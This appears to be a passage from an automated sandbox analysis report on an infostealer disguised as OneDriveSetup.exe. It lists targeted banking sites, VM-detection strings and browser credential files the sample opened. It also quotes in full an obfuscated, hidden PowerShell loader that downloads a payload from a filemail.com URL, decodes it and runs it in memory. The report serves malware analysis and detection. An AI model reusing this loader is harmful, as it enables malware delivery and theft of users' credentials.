                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vboxtrayOC:\windows\System32\Drivers\Vmmouse.sysMC:\windows\System32\Drivers\vm3dgl.dllMC:\windows\System32\Drivers\vmtray.dllWC:\windows\System32\Drivers\VMToolsHook.dllUC:\windows\System32\Drivers\vmmousever.dllSC:\windows\System32\Drivers\VBoxMouse.sysSC:\windows\System32\Drivers\VBoxGuest.sysMC:\windows\System32\Drivers\VBoxSF.sysSC:\windows\System32\Drivers\VBoxVideo.sysGC:\windows\System32\vboxservice.exe
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: OneDriveSetup.exe, 00000006.00000002.2693892304.000000000693B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vboxtray
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q*C:\windows\System32\Drivers\vmmousever.dll
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Vmtoolsd
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: q)C:\windows\System32\Drivers\VBoxMouse.sys
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeAPI call chain: ExitProcess graph end nodegraph_6-33323
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C419578 LdrInitializeThunk,6_2_0C419578
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Code function: 6_2_0040ADB0 GetProcessHeap,HeapFree,6_2_0040ADB0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Code function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\wscript.exe | Network Connect: 104.21.84.67 443
                  Source: Yara match | File source: amsi64_8064.amsi.csv, type: OTHER
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8064, type: MEMORYSTR
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 41B000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 422000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 426000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 92A008
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\OneDriveSetup.exe "C:\Windows\SysWOW64\OneDriveSetup.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( ([string]$verbosepreference)[1,3]+'x'-join'')( (('eihimageurl'+' = znqhttps://3105.filemail.com/'+'api/file/get?filekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq95-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c znq;eihwebclient = new-object system.net.webclient;eihimagebytes = eihwebclient.downloaddata(eihimageurl);eihimagetex'+'t = [system.text.encoding]::utf8.getstring(eihi'+'magebytes);eihstartflag = znq<<base64_start'+'>>znq;eih'+'endflag = znq<<base64_end>>znq;eihst'+'art'+'index = eihimagetext.indexof'+'(eihstartflag);eihen'+'dindex = eihimagetext.inde'+'xo'+'f(eihen'+'dflag);eihstartindex -ge 0 -and eihendindex -gt eihstartindex;eihstartindex += eihstartflag.length;eihbase64length = eihendindex - eihstartindex;eihbase64com'+'mand = eihimagetext.substring('+'eihstartindex, eihbase'+'64length);eihbase64reversed = '+'-join (eihbase64command.tochararray() otf foreach-object { eih_ })[-1..-'+'(eihbase64command.length)];e'+'ihcommandbytes = [system.convert]::frombase64string(eih'+'base'+'64reversed);eihloadedassembly = [s'+'ystem.reflection.assembly]::load(eihcommand'+'bytes);eihvaimethod = [dnlib.io.home].getmethod(znqvaiznq);eihvaimethod.invoke(eihnull, @(znqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'znq, znqdesat'+'ivadoznq, znqdesa'+'tivadoz'+'nq, zn'+'qdesativadoznq,'+' znqdesativadoznq, znq1'+'znq, znqonedrivesetupznq, znqdesativadoznq, znqdesativadoznq,znqdesativadoznq,znqd'+'esativadoznq,znqdesativa'+'doznq,znq1znq,znqdes'+'at'+'ivadoznq));') -creplace'znq',[char]39 -replace ([char]69+[char]73+[char]72),[char]36-replace ([char]79+[char]84+[char]70),[char]124))"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Code function: GetLocaleInfoA,6_2_00417A20
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Code function: 6_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_00412A15
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: OneDriveSetup.exe PID: 7588, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86ef9ee.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.aff0000.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.86f090e.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
